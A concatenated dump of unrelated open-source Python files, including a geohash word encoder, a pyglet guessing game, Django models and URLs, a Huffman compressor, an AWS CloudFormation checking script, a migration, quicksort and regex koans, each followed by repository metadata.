self._symbols = "0123456789bcdefghjkmnpqrstuvwxyz"
self._decode_symbols = dict((ch, i) for (i, ch) in enumerate(self._symbols))
self._encode_symbols = dict((i, ch) for (i, ch) in enumerate(self._symbols))
self.six_wordlist = HUMAN_WORDLIST
self.four_wordlist = GOOGLE_4096WORDS
self.three_wordlist = GOOGLE_WORDLIST
def three_words(self, lat_long):
"""Convert coordinate to a combination of three words
The coordinate is defined by latitude and longitude
in degrees.
"""
lat, lon = lat_long
gh = geohash.encode(lat, lon, 9)
words = "-".join(self.three_wordlist[p] for p in self.to_rugbits(self.geo_to_int(gh)))
return words
def four_words(self, lat_long):
"""Convert coordinate to a combination of four words
The coordinate is defined by latitude and longitude
in degrees.
"""
lat, lon = lat_long
gh = geohash.encode(lat, lon, 9)
words = "-".join(self.four_wordlist[p] for p in self.to_quads(self.pad(gh)))
return words
def six_words(self, lat_long):
"""Convert coordinate to a combination of six words
The coordinate is defined by latitude and longitude
in degrees.
        With six words the word list contains only words
        which are short, easy to pronounce and easy to distinguish.
"""
lat, lon = lat_long
gh = geohash.encode(lat, lon, 9)
words = "-".join(self.six_wordlist[p] for p in self.to_bytes(self.pad(gh)))
return words
def decode(self, words):
"""Decode `words` to latitude and longitude"""
words = words.split("-")
if len(words) == 3:
i = self.rugbits_to_int([self.three_wordlist.index(w) for w in words])
elif len(words) == 4:
i = self.quads_to_int([self.four_wordlist.index(w) for w in words])
i = self.unpad(i)
elif len(words) == 6:
i = self.bytes_to_int([self.six_wordlist.index(w) for w in words])
i = self.unpad(i)
else:
raise RuntimeError("Do not know how to decode a set of %i words."%(len(words)))
geo_hash = self.int_to_geo(i)
return geohash.decode(geo_hash)
def geo_to_int(self, geo_hash):
"""Decode `geo_hash` to an integer"""
base = len(self._symbols)
number = 0
for symbol in geo_hash:
number = number*base + self._decode_symbols[symbol]
return number
def int_to_geo(self, integer):
"""Encode `integer` to a geo hash"""
base = len(self._symbols)
symbols = []
while integer > 0:
remainder = integer % base
integer //= base
symbols.append(self._encode_symbols[remainder])
return ''.join(reversed(symbols))
def pad(self, geo_hash):
"""Pad nine character `geo_hash` to 48bit integer"""
assert len(geo_hash) == 9
return self.geo_to_int(geo_hash) * 8
def unpad(self, integer):
"""Remove 3bit of padding to get 45bit geo hash"""
return integer>>3
def to_bytes(self, integer):
"""Convert a 48bit `integer` to a list of 6bytes"""
bytes = [integer & 0b11111111]
for n in range(1,6):
div = 2**(n*8)
bytes.append((integer//div) & 0b11111111)
bytes.reverse()
return bytes
def bytes_to_int(self, bytes):
"""Convert a list of 6`bytes` to an integer"""
assert len(bytes) == 6
N = 0
bytes.reverse()
for n,b in enumerate(bytes):
N += b * (2**(8*(n)))
return N
def to_quads(self, integer):
"""Convert a 48bit `integer` to a list of 4 quads"""
quads = [integer & 0b111111111111]
for n in range(1,4):
div = 2**(n*12)
quads.append((integer//div) & 0b111111111111)
quads.reverse()
return quads
def quads_to_int(self, quads):
"""Convert a list of four 12bit values to an integer"""
assert len(quads) == 4
N = 0
quads.reverse()
for n,b in enumerate(quads):
N += b * (2**(12*(n)))
return N
def to_rugbits(self, integer):
"""Convert a 45bit `integer` to a list of 3rugbits
A rugbit is like a byte but with 15bits instead of eight.
"""
fifteen_bits = 0b111111111111111
rugbits = [(integer//(2**30)) & fifteen_bits,
(integer//(2**15)) & fifteen_bits,
integer & fifteen_bits]
return rugbits
def rugbits_to_int(self, rugbits):
"""Convert a list of `rugbits` to an integer"""
assert len(rugbits) == 3
return (rugbits[0] *(2**30)) + (rugbits[1] *(2**15)) + (rugbits[2])
DEFAULT_HASHER = WordHasher()
three_words = DEFAULT_HASHER.three_words
four_words = DEFAULT_HASHER.four_words
six_words = DEFAULT_HASHER.six_words
decode = DEFAULT_HASHER.decode
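# A minimal usage sketch (hypothetical coordinates; assumes the word-list files exist):
# >>> import thisplace
# >>> words = thisplace.four_words((51.5, -0.12))
# >>> thisplace.decode(words)  # round-trips to roughly the same coordinate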
|
Placeware/ThisPlace
|
thisplace.py
|
Python
|
mit
| 8,967
|
#!/usr/bin/env python3
# vim: tw=76
import kxg
import random
import pyglet
LOWER_BOUND, UPPER_BOUND = 0, 5000
class World(kxg.World):
"""
Keep track of the secret number, the range of numbers that haven't been
eliminated yet, and the winner (if there is one).
"""
def __init__(self):
super().__init__()
self.number = 0
self.lower_bound = 0
self.upper_bound = 0
self.winner = 0
class Referee(kxg.Referee):
"""
Pick the secret number.
"""
def on_start_game(self, num_players):
number = random.randint(LOWER_BOUND + 1, UPPER_BOUND - 1)
self >> PickNumber(number, LOWER_BOUND, UPPER_BOUND)
class PickNumber(kxg.Message):
"""
Pick the secret number and communicate that choice to all the clients.
"""
def __init__(self, number, lower_bound, upper_bound):
self.number = number
self.lower_bound = lower_bound
self.upper_bound = upper_bound
def on_check(self, world):
if world.number:
raise kxg.MessageCheck("number already picked")
def on_execute(self, world):
world.number = self.number
world.lower_bound = self.lower_bound
world.upper_bound = self.upper_bound
class GuessNumber(kxg.Message):
"""
Make a guess on behalf of the given player. If the guess is
right, that player wins the game. If the guess is wrong, the
range of numbers that the secret number could be is narrowed
accordingly.
"""
def __init__(self, player, guess):
self.player = player
self.guess = guess
def on_check(self, world):
pass
def on_execute(self, world):
if self.guess == world.number:
world.winner = self.player
world.end_game()
elif self.guess < world.number:
world.lower_bound = max(self.guess, world.lower_bound)
elif self.guess > world.number:
world.upper_bound = min(self.guess, world.upper_bound)
class Gui:
"""
Manage GUI objects like the window, which exist before and after the game
itself.
"""
def __init__(self):
self.width, self.height = 600, 400
self.window = pyglet.window.Window()
self.window.set_size(self.width, self.height)
self.window.set_visible(True)
self.label = pyglet.text.Label(
"",
color=(255, 255, 255, 255),
font_name='Deja Vu Sans', font_size=32,
x=self.width//2, y=self.height//2,
anchor_x='center', anchor_y='center',
)
def on_refresh_gui(self):
self.window.clear()
self.label.draw()
class GuiActor(kxg.Actor):
"""
Show the players the range of numbers that haven't been eliminated yet,
and allow the player to guess what the number is.
"""
def __init__(self):
super().__init__()
self.guess = None
self.prompt = "{0.lower_bound} < {1} < {0.upper_bound}"
def on_setup_gui(self, gui):
self.gui = gui
self.gui.window.set_handlers(self)
def on_draw(self):
self.gui.on_refresh_gui()
def on_mouse_scroll(self, x, y, dx, dy):
# If the user scrolls the mouse wheel, update the guess accordingly.
if self.guess is None:
if dy < 0:
self.guess = self.world.upper_bound
else:
self.guess = self.world.lower_bound
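            # Clamp the adjusted guess to the remaining range by taking the
            # middle of the three sorted values.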
self.guess = sorted([
self.world.lower_bound,
self.guess + dy,
self.world.upper_bound,
])[1]
self.on_update_prompt()
def on_key_press(self, symbol, modifiers):
# If the user types a number, add that digit to the guess.
try:
digit = int(chr(symbol))
self.guess = 10 * (self.guess or 0) + digit
except ValueError:
pass
# If the user hits backspace, remove the last digit from the guess.
if symbol == pyglet.window.key.BACKSPACE:
if self.guess is not None:
guess_str = str(self.guess)[:-1]
self.guess = int(guess_str) if guess_str else None
# If the user hits enter, guess the current number.
if symbol == pyglet.window.key.ENTER:
if self.guess:
self >> GuessNumber(self.id, self.guess)
self.guess = None
self.on_update_prompt()
@kxg.subscribe_to_message(PickNumber)
@kxg.subscribe_to_message(GuessNumber)
def on_update_prompt(self, message=None):
guess_str = '???' if self.guess is None else str(self.guess)
self.gui.label.text = self.prompt.format(self.world, guess_str)
def on_finish_game(self):
self.gui.window.pop_handlers()
if self.world.winner == self.id:
self.gui.label.text = "You won!"
else:
self.gui.label.text = "You lost!"
class AiActor(kxg.Actor):
"""
Wait a random amount of time, then guess a random number within the
remaining range.
"""
def __init__(self):
super().__init__()
self.reset_timer()
def on_update_game(self, dt):
self.timer -= dt
if self.timer < 0:
lower_bound = self.world.lower_bound + 1
upper_bound = self.world.upper_bound - 1
guess = random.randint(lower_bound, upper_bound)
self >> GuessNumber(self.id, guess)
self.reset_timer()
def reset_timer(self):
self.timer = random.uniform(1, 3)
if __name__ == '__main__':
kxg.quickstart.main(World, Referee, Gui, GuiActor, AiActor)
|
kxgames/kxg
|
demos/guess_my_number.py
|
Python
|
mit
| 5,672
|
#!/usr/bin/env python3
# Copyright (C) 2017-2021 The btclib developers
#
# This file is part of btclib. It is subject to the license terms in the
# LICENSE file found in the top-level directory of this distribution.
#
# No part of btclib including this file, may be copied, modified, propagated,
# or distributed except according to the terms contained in the LICENSE file.
"Tests for the `btclib.hashes` module."
from btclib.hashes import hash160, hash256
from tests.test_to_key import (
net_unaware_compressed_pub_keys,
net_unaware_uncompressed_pub_keys,
plain_prv_keys,
)
def test_hash160_hash256() -> None:
test_vectors = (
plain_prv_keys
+ net_unaware_compressed_pub_keys
+ net_unaware_uncompressed_pub_keys
)
for hexstring in test_vectors:
hash160(hexstring)
hash256(hexstring)
# def test_fingerprint() -> None:
#
# seed = "bfc4cbaad0ff131aa97fa30a48d09ae7df914bcc083af1e07793cd0a7c61a03f65d622848209ad3366a419f4718a80ec9037df107d8d12c19b83202de00a40ad"
# xprv = rootxprv_from_seed(seed)
# pf = fingerprint(xprv) # xprv is automatically converted to xpub
# child_key = derive(xprv, 0x80000000)
# pf2 = BIP32KeyData.b58decode(child_key).parent_fingerprint
# assert pf == pf2
|
fametrano/BitcoinBlockchainTechnology
|
tests/test_hashes.py
|
Python
|
mit
| 1,276
|
from django.conf.urls import include, url
from django.contrib import admin
from Poller import views
urlpatterns = [
url(r'^$', views.IndexView.as_view(), name='index'),
url(r'^(?P<pk>\d+)/$', views.DetailView.as_view(), name='detail'),
url(r'^(?P<pk>\d+)/results/$', views.ResultsView.as_view(), name='results'),
url(r'^(?P<question_id>\d+)/vote/$', views.vote, name='vote'),
]
|
zzeleznick/zDjango
|
Poller/urls.py
|
Python
|
mit
| 396
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import os
import marshal
import cPickle
import array
class HuffmanNode(object):
recurPrint = False
def __init__(self, ch=None, fq=None, lnode=None, rnode=None, parent=None):
self.L = lnode
self.R = rnode
self.p = parent
self.c = ch
self.fq = fq
def __repr__(self):
if HuffmanNode.recurPrint:
lnode = self.L if self.L else '#'
rnode = self.R if self.R else '#'
return ''.join( ('(%s:%d)'%(self.c, self.fq), str(lnode), str(rnode) ) )
else:
return '(%s:%d)'%(self.c, self.fq)
def __cmp__(self, other):
if not isinstance(other, HuffmanNode):
return super(HuffmanNode, self).__cmp__(other)
return cmp(self.fq, other.fq)
def _pop_first_two_nodes(nodes):
if len(nodes)>1:
first=nodes.pop(0)
second=nodes.pop(0)
return first, second
else:
#print "[popFirstTwoNodes] nodes's length <= 1"
return nodes[0], None
def _build_tree(nodes):
nodes.sort()
    while True:
first, second = _pop_first_two_nodes(nodes)
if not second:
return first
parent = HuffmanNode(lnode=first, rnode=second, fq=first.fq+second.fq)
first.p = parent
second.p = parent
nodes.insert(0, parent)
nodes.sort()
def _gen_huffman_code(node, dict_codes, buffer_stack=[]):
if not node.L and not node.R:
dict_codes[node.c] = ''.join(buffer_stack)
return
buffer_stack.append('0')
_gen_huffman_code(node.L, dict_codes, buffer_stack)
buffer_stack.pop()
buffer_stack.append('1')
_gen_huffman_code(node.R, dict_codes, buffer_stack)
buffer_stack.pop()
def _cal_freq(long_str):
from collections import defaultdict
d = defaultdict(int)
for c in long_str:
d[c] += 1
return d
MAX_BITS = 8
class Encoder(object):
def __init__(self, filename_or_long_str=None):
if filename_or_long_str:
if os.path.exists(filename_or_long_str):
self.encode(filename_or_long_str)
else:
#print '[Encoder] take \'%s\' as a string to be encoded.'\
# % filename_or_long_str
self.long_str = filename_or_long_str
def __get_long_str(self):
return self._long_str
def __set_long_str(self, s):
self._long_str = s
if s:
self.root = self._get_tree_root()
self.code_map = self._get_code_map()
self.array_codes, self.code_length = self._encode()
long_str = property(__get_long_str, __set_long_str)
def _get_tree_root(self):
d = _cal_freq(self.long_str)
return _build_tree(
[HuffmanNode(ch=ch, fq=int(fq)) for ch, fq in d.iteritems()]
)
def _get_code_map(self):
a_dict={}
_gen_huffman_code(self.root, a_dict)
return a_dict
def _encode(self):
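        # Pack the variable-length bit codes into fixed 8-bit bytes, flushing
        # a byte whenever the buffer fills; code_length counts the total bits.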
array_codes = array.array('B')
code_length = 0
buff, length = 0, 0
for ch in self.long_str:
code = self.code_map[ch]
for bit in list(code):
if bit=='1':
buff = (buff << 1) | 0x01
else: # bit == '0'
buff = (buff << 1)
length += 1
if length == MAX_BITS:
array_codes.extend([buff])
buff, length = 0, 0
code_length += len(code)
if length != 0:
array_codes.extend([buff << (MAX_BITS-length)])
return array_codes, code_length
def encode(self, filename):
fp = open(filename, 'rb')
self.long_str = fp.read()
fp.close()
def write(self, filename):
if self._long_str:
fcompressed = open(filename, 'wb')
marshal.dump(
(cPickle.dumps(self.root), self.code_length, self.array_codes),
fcompressed)
fcompressed.close()
else:
print "You haven't set 'long_str' attribute."
class Decoder(object):
def __init__(self, filename_or_raw_str=None):
if filename_or_raw_str:
if os.path.exists(filename_or_raw_str):
filename = filename_or_raw_str
self.read(filename)
else:
print '[Decoder] take \'%s\' as raw string' % filename_or_raw_str
raw_string = filename_or_raw_str
unpickled_root, length, array_codes = marshal.loads(raw_string)
self.root = cPickle.loads(unpickled_root)
self.code_length = length
self.array_codes = array.array('B', array_codes)
def _decode(self):
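        # Walk the Huffman tree bit by bit; each leaf emits a symbol and the
        # walk restarts from the root.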
string_buf = []
total_length = 0
node = self.root
for code in self.array_codes:
buf_length = 0
while (buf_length < MAX_BITS and total_length != self.code_length):
buf_length += 1
total_length += 1
if code >> (MAX_BITS - buf_length) & 1:
node = node.R
if node.c:
string_buf.append(node.c)
node = self.root
else:
node = node.L
if node.c:
string_buf.append(node.c)
node = self.root
return ''.join(string_buf)
def read(self, filename):
fp = open(filename, 'rb')
unpickled_root, length, array_codes = marshal.load(fp)
self.root = cPickle.loads(unpickled_root)
self.code_length = length
self.array_codes = array.array('B', array_codes)
fp.close()
def decode_as(self, filename):
decoded = self._decode()
fout = open(filename, 'wb')
fout.write(decoded)
fout.close()
if __name__=='__main__':
original_file = 'filename.txt'
compressed_file = 'compressed.scw'
decompressed_file = 'filename2.txt'
# first way to use Encoder/Decoder
enc = Encoder(original_file)
enc.write(compressed_file)
dec = Decoder(compressed_file)
dec.decode_as(decompressed_file)
# second way
#enc = Encoder()
#enc.encode(original_file)
#enc.write(compressed_file)
#dec = Decoder()
#dec.read(compressed_file)
#dec.decode_as(decompressed_file)
|
fepe55/RAMB0
|
python/huffman2.py
|
Python
|
mit
| 6,447
|
#!/usr/bin/env python
#
# Generate pnSeed[] from Pieter's DNS seeder
#
NSEEDS=600
import re
import sys
from subprocess import check_output
def main():
lines = sys.stdin.readlines()
ips = []
pattern = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3}):11000")
for line in lines:
m = pattern.match(line)
if m is None:
continue
ip = 0
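        # Pack the four dotted-quad octets into a little-endian 32-bit integer.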
for i in range(0,4):
ip = ip + (int(m.group(i+1)) << (8*(i)))
if ip == 0:
continue
ips.append(ip)
for row in range(0, min(NSEEDS,len(ips)), 8):
print " " + ", ".join([ "0x%08x"%i for i in ips[row:row+8] ]) + ","
if __name__ == '__main__':
main()
|
prolifik/Furrycoin
|
contrib/seeds/makeseeds.py
|
Python
|
mit
| 709
|
# Source:https://github.com/FastLED/FastLED/blob/master/examples/Fire2012WithPalette/Fire2012WithPalette.ino
from __future__ import division
import math
import random
from colour import Color
#import randomcolor
from PIL import Image, ImageChops, ImageDraw, ImageFont
from components import App
def hex_to_rgb(value):
value = value.lstrip('#')
lv = len(value)
return tuple(int(value[i:i + lv // 3], 16) for i in range(0, lv, lv // 3))
class Pattern_Fire(App):
""" Create a fire animation """
def __init__(self, device):
self.device = device
self.width = device.width
self.height = device.height
self.heat = [[0 for x in range(device.width)]
for y in range(device.height)]
# COOLING: How much does the air cool as it rises?
# Less cooling = taller flames. More cooling = shorter flames.
# Default 55, suggested range 20-100
self.cooling = 100
# SPARKING: What chance (out of 255) is there that a new spark will be lit?
# Higher chance = more roaring fire. Lower chance = more flickery fire.
# Default 120, suggested range 50-200.
self.sparking = 80
black = Color("black")
red = Color("red")
yellow = Color("yellow")
blue = Color("#6b99ff")
white = Color("white")
self.colors = []
self.colors += list(black.range_to(red, 116))
self.colors += list(red.range_to(yellow, 140))
self.colors += list(yellow.range_to(white, 10))
self.image = None
def handle_input(self, command):
if command == "UP":
self.cooling -= 1
elif command == "DOWN":
self.cooling += 1
elif command == "LEFT":
self.sparking += 1
elif command == "RIGHT":
self.sparking -= 1
self.cooling = min(max(self.cooling, 0), 255)
self.sparking = min(max(self.sparking, 0), 255)
def draw_frame(self):
pix = self.device.image.load()
for x in range(self.width):
# Step 1: cool down every cell a little
for y in range(self.height):
cooling_factor = random.randint(
0, int(((self.cooling * 10) / self.height) + 2))
self.heat[x][y] = max(self.heat[x][y] - cooling_factor, 0)
# Step 2: Heat from each cell drifts up and diffuses a little
for y in range(self.height):
y1 = min(y + 1, self.height - 1)
y2 = min(y + 2, self.height - 1)
                self.heat[x][y] = (self.heat[x][y1] + self.heat[x][y2] + self.heat[x][y2]) / 3
# Step 3: Randomly ignite sparks of heat
if random.randrange(0, 255) < self.sparking:
y0 = self.height - 1
self.heat[x][y0] = min(
(self.heat[x][y0] + random.randrange(160, 255)), 255)
# Step 4: Map to the colors
for y in range(self.height):
color_index = int(self.heat[x][y]) # int(math.ceil(self.heat[x][y]))
c = self.colors[color_index]
pix[x, y] = (int(c.red * 255), int(c.green * 255), int(c.blue * 255))
self.device.display()
return 10
|
mattgrogan/ledmatrix
|
ledmatrix/pattern/fire.py
|
Python
|
mit
| 3,096
|
from django.db import models
from django.contrib.auth.models import User
class StockStatus(models.Model):
date = models.DateTimeField(auto_now_add=True)
price = models.FloatField()
change = models.FloatField()
volume = models.IntegerField()
average_daily_volume = models.IntegerField()
market_cap = models.CharField(max_length=100)
book_value = models.FloatField()
ebitda = models.CharField(max_length=100)
dividend_per_share = models.FloatField()
dividend_yield = models.FloatField()
earnings_per_share = models.FloatField()
i52_week_high = models.FloatField()
i52_week_low = models.FloatField()
i50_day_moving_average = models.FloatField()
i200_day_moving_average = models.FloatField()
price_to_earnings_ratio = models.FloatField()
price_to_earnings_growth_ratio = models.FloatField()
price_to_sales_ratio = models.FloatField()
price_to_book_ratio = models.FloatField()
class Stock(models.Model):
symbol = models.CharField(max_length=25)
exchange = models.CharField(max_length=25)
history = models.ManyToManyField(StockStatus)
price = models.FloatField()
def __unicode__(self): return self.symbol
class Order(models.Model):
type = models.CharField(max_length=25)
amount = models.IntegerField()
stock = models.ForeignKey(Stock)
date = models.DateTimeField(auto_now_add=True)
def __unicode__(self): return u'%s %s' % (self.type, self.stock.symbol)
class Position(models.Model):
amount = models.IntegerField()
stock = models.ForeignKey(Stock)
value = models.FloatField()
def __unicode__(self): return u'%s of %s' % (self.amount, self.stock.symbol)
class Portfolio(models.Model):
user = models.ForeignKey(User)
history = models.ManyToManyField(Order)
positions = models.ManyToManyField(Position)
value = models.FloatField()
balance = models.FloatField()
created = models.DateTimeField(auto_now_add=True)
def __unicode__(self): return self.user.username
|
jwilson780/VirtualStockMarket
|
stockmarket/models.py
|
Python
|
mit
| 2,038
|
# TODO WIP this is meant to find discrepancies between the stack templates that
# are deployed to CloudFormation and what is checked in, and to do some other
# basic sanity checks on the stacks and their configurations
import boto3
import re
cloudformation = boto3.client("cloudformation")
stacks = cloudformation.describe_stacks()
# Stack Notifications
# Examines all stacks to ensure they have the shared CloudFormation
# notification SNS topic configured as a notification ARN
cfn_topic = (
"arn:aws:sns:us-east-1:561178107736:infrastructure-"
"notifications-CloudFormationNotificationSnsTopic-2OCAWQM7S7BP"
)
print("======================================================================")
print("These stacks do NOT include the notification ARN:")
for stack in stacks["Stacks"]:
if cfn_topic not in stack["NotificationARNs"]:
print(f"{stack['StackName']}")
# Template continuity
# Compares the template for certain stacks, as they exist in CloudFormation,
# to your local copy. If you are on master these should not have any
# differences. The first line of each template should contain a relative path
# to the file in the Infrastructure repo. If that path appears to be missing,
# this will report a warning
print("======================================================================")
for stack in stacks["Stacks"]:
cfn_template = cloudformation.get_template(StackName=stack["StackName"])
cfn_body = cfn_template["TemplateBody"]
cfn_first_line = cfn_body.split("\n", 1)[0]
if re.match(r"\# ([a-zA-Z/_\-\.]+yml)", cfn_first_line) is None:
print(f"Missing template path: {stack['StackName']}")
else:
template_path = re.findall(r"\# ([a-zA-Z/_\-\.]+yml)", cfn_first_line)[0]
local_path = f"../{template_path}"
        try:
            local_body = open(local_path, "r").read()
        except FileNotFoundError:
            print(f"File error: {stack['StackName']}")
            continue
        if local_body != cfn_body:
            print(f"Template mismatch: {stack['StackName']}")
|
PRX/Infrastructure
|
bin/continuity.py
|
Python
|
mit
| 2,044
|
import numpy as np
from . import finiteelements as fe
from . import matrices
from math import cos
class Result:
def __init__(self, freq, u1, u2, u3, mesh, geometry):
self.freq = freq
self.u1 = u1
self.u2 = u2
self.u3 = u3
self.mesh = mesh
self.geometry = geometry
def rad_per_sec_to_Hz(self, rps):
return rps/(2*np.pi)
def get_displacement_and_deriv(self, x1, x2, x3, time):
element = self.mesh.get_element(x1, x3)
        if element is None:
            raise ValueError("no element found at x1 = {}, x3 = {}".format(x1, x3))
u_nodes = np.zeros((8))
u_nodes[0] = self.u1[element.top_left_index]
u_nodes[1] = self.u1[element.top_right_index]
u_nodes[2] = self.u1[element.bottom_right_index]
u_nodes[3] = self.u1[element.bottom_left_index]
u_nodes[4] = self.u3[element.top_left_index]
u_nodes[5] = self.u3[element.top_right_index]
u_nodes[6] = self.u3[element.bottom_right_index]
u_nodes[7] = self.u3[element.bottom_left_index]
h_e = matrices.element_aprox_functions(element, x1, x2, x3)
return h_e.dot(u_nodes) * self.fi(time)
def get_strain(self, x1, x2, x3, time):
B = matrices.deriv_to_grad(self.geometry, x1, x2, x3)
u = self.get_displacement_and_deriv(x1, x2, x3, time)
grad_u = B.dot(u)
E = matrices.grad_to_strain()
# E_NL = grad_to_strain_nonlinear_matrix(alpha1, alpha2, geometry, grad_u)
return E.dot(grad_u)
def get_strain_nl(self, x1, x2, x3, time):
B = matrices.deriv_to_grad(self.geometry, x1, x2, x3)
u = self.get_displacement_and_deriv(x1, x2, x3, time)
grad_u = B.dot(u)
E = matrices.grad_to_strain()
E_NL = matrices.deformations_nl(self.geometry, grad_u, x1, x2, x3)
return (E + E_NL).dot(grad_u)
def fi(self, time):
return cos(self.freq * time)
|
tarashor/vibrations
|
py/fem/result.py
|
Python
|
mit
| 2,014
|
""" Define a Check monad and corresponding functions.
"""
from functools import (reduce, partial)
class Check:
""" This super class is not really necessary but helps make the structure
clear.
data Check a = Pass a | Fail Message
"""
pass
class Pass(Check):
def __init__(self, value):
self.value = value
class Fail(Check):
def __init__(self, message):
self.message = message
def is_(t, x):
""" Check whether the type of a given x is a given type t.
"""
return type(x) is t
is_check = partial(is_, Check)
is_pass = partial(is_, Pass)
is_fail = partial(is_, Fail)
def return_(x):
""" Monadic return for the Check monad.
return :: a -> m a
return = Pass
"""
return Pass(x)
def bind(f):
""" Monadic bind for the Check monad.
(>>=) :: m a -> (a -> m b) -> m b
Fail x >>= f = Fail x
Pass x >>= f = f x
"""
def bind_impl(x):
if is_fail(x):
return x
if is_pass(x):
return f(x.value)
raise ValueError('Check has to be of type Pass | Fail.')
return bind_impl
def compose(f, g):
""" Kleisli composition of two (Check-)monadic functions f and g.
(>=>) :: (a -> m b) -> (b -> m c) -> (a -> m c)
"""
def compose_impl(x):
return bind(g)(f(x))
return compose_impl
def compose_many(*fs):
""" Reduces a variable number of functions with composition.
Same as repeatedly calling `compose` on pairs.
"""
return reduce(compose, fs)
def lift(f, message):
""" Lifts a boolean function into the realm of the Check monad.
lift :: (a -> bool) -> String -> (a -> Check a)
"""
def lift_impl(x):
if f(x):
return return_(x)
return Fail(message)
return lift_impl
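# A minimal usage sketch (hypothetical checks, not part of this module):
# is_positive = lift(lambda x: x > 0, 'must be positive')
# is_even = lift(lambda x: x % 2 == 0, 'must be even')
# check = compose(is_positive, is_even)
# assert is_pass(check(4)) and is_fail(check(3))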
|
kdungs/python-mcheck
|
mcheck/__init__.py
|
Python
|
mit
| 1,840
|
"""
Revision ID: 0146_add_service_callback_api
Revises: 0145_add_notification_reply_to
Create Date: 2017-11-28 15:13:48.730554
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
revision = '0146_add_service_callback_api'
down_revision = '0145_add_notification_reply_to'
def upgrade():
op.create_table('service_callback_api_history',
sa.Column('id', postgresql.UUID(as_uuid=True), nullable=False),
sa.Column('service_id', postgresql.UUID(as_uuid=True), nullable=False),
sa.Column('url', sa.String(), nullable=False),
sa.Column('bearer_token', sa.String(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('updated_by_id', postgresql.UUID(as_uuid=True), nullable=False),
sa.Column('version', sa.Integer(), autoincrement=False, nullable=False),
sa.PrimaryKeyConstraint('id', 'version')
)
op.create_index(op.f('ix_service_callback_api_history_service_id'), 'service_callback_api_history',
['service_id'], unique=False)
op.create_index(op.f('ix_service_callback_api_history_updated_by_id'), 'service_callback_api_history',
['updated_by_id'], unique=False)
op.create_table('service_callback_api',
sa.Column('id', postgresql.UUID(as_uuid=True), nullable=False),
sa.Column('service_id', postgresql.UUID(as_uuid=True), nullable=False),
sa.Column('url', sa.String(), nullable=False),
sa.Column('bearer_token', sa.String(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('updated_by_id', postgresql.UUID(as_uuid=True), nullable=False),
sa.Column('version', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['service_id'], ['services.id'], ),
sa.ForeignKeyConstraint(['updated_by_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_service_callback_api_service_id'), 'service_callback_api', ['service_id'], unique=True)
op.create_index(op.f('ix_service_callback_api_updated_by_id'), 'service_callback_api', ['updated_by_id'], unique=False)
def downgrade():
op.drop_index(op.f('ix_service_callback_api_updated_by_id'), table_name='service_callback_api')
op.drop_index(op.f('ix_service_callback_api_service_id'), table_name='service_callback_api')
op.drop_table('service_callback_api')
op.drop_index(op.f('ix_service_callback_api_history_updated_by_id'), table_name='service_callback_api_history')
op.drop_index(op.f('ix_service_callback_api_history_service_id'), table_name='service_callback_api_history')
op.drop_table('service_callback_api_history')
|
alphagov/notifications-api
|
migrations/versions/0146_add_service_callback_api.py
|
Python
|
mit
| 2,779
|
"""
Author: Maneesh Divana <mdaneeshd77@gmail.com>
Interpreter: Python 3.6.8
Quick Sort
Worst Case: O(n^2)
Average Case: O(nlog n)
Best Case: O(nlog n)
"""
from random import shuffle
def partition(arr: list, left: int, right: int) -> int:
"""Partitions the given array based on a pivot element,
then sorts the sub-arrays and returns the partition index"""
# Take the right most element as pivot
pivot = arr[right]
# i tracks the smallest element, currently invalid
i = left - 1
for j in range(left, right):
# Check if the current element is smaller than pivot element
if arr[j] <= pivot:
i += 1
# If so, swap the smallest element and the current element
arr[i], arr[j] = arr[j], arr[i]
# One final swap to put pivot element at its correct position
arr[i + 1], arr[right] = arr[right], arr[i + 1]
# Return the partition index
return i + 1
def qsort(arr: list, left: int, right: int) -> None:
"""Recursively partitions the given array and sorts based on
QuickSort algorithm."""
if left < right:
# Partition the array and get the partition index
p_idx = partition(arr, left, right)
# Recursively partition and sort the sub-arrays
qsort(arr, left, p_idx - 1)
qsort(arr, p_idx + 1, right)
if __name__ == "__main__":
ARR = list(range(0, 10))
shuffle(ARR)
LEFT = 0
RIGHT = len(ARR) - 1
print("\nQuickSort\n")
print("Input array:", ARR)
qsort(ARR, LEFT, RIGHT)
print("\nSorted array:", ARR, "\n")
|
maneeshd/Algorithms-and-Data-Structures
|
algorithms/QuickSort.py
|
Python
|
mit
| 1,581
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
import re
class AboutRegex(Koan):
"""
    These koans are based on Ben's book: Regular Expressions in 10 Minutes.
    I found this book very useful, so I decided to write these koans in order to practice everything I had learned from it.
http://www.forta.com/books/0672325667/
"""
def test_matching_literal_text(self):
"""
Lesson 1 Matching Literal String
"""
string = "Hello, my name is Felix and this koans are based on the Ben's book: Regular Expressions in 10 minutes."
m = re.search(r'Felix', string)
self.assertTrue(m and m.group(0) and m.group(0)== 'Felix', "I want my name")
def test_matching_literal_text_how_many(self):
"""
Lesson 1 How many matches?
The default behaviour of most regular expression engines is to return just the first match.
In python you have the next options:
match() --> Determine if the RE matches at the beginning of the string.
search() --> Scan through a string, looking for any location where this RE matches.
findall() --> Find all substrings where the RE matches, and returns them as a list.
finditer() --> Find all substrings where the RE matches, and returns them as an iterator.
"""
string = "Hello, my name is Felix and this koans are based on the Ben's book: Regular Expressions in 10 minutes. Repeat My name is Felix"
m = len(re.findall('Felix', string)) #TIP: Maybe match it's not the best option
# I want to know how many times appears my name
self.assertEqual(m, 2)
def test_matching_literal_text_not_case_sensitivity(self):
"""
        Lesson 1 Matching literal strings without case sensitivity.
        Most regex implementations also support matches that are not case sensitive. In Python you can use re.IGNORECASE; in
        JavaScript you can specify the optional i flag.
        Ben's book covers more languages.
"""
string = "Hello, my name is Felix or felix and this koans is based on the Ben's book: Regular Expressions in 10 minutes."
self.assertEqual(re.findall("felix", string), ['felix'])
self.assertEqual(re.findall("felix", string, re.IGNORECASE), ['Felix', 'felix'])
def test_matching_any_character(self):
"""
Lesson 1 Matching any character
        . matches any single character: letters, digits, even a literal dot.
"""
string = "pecks.xlx\n" \
+ "orders1.xls\n" \
+ "apec1.xls\n" \
+ "na1.xls\n" \
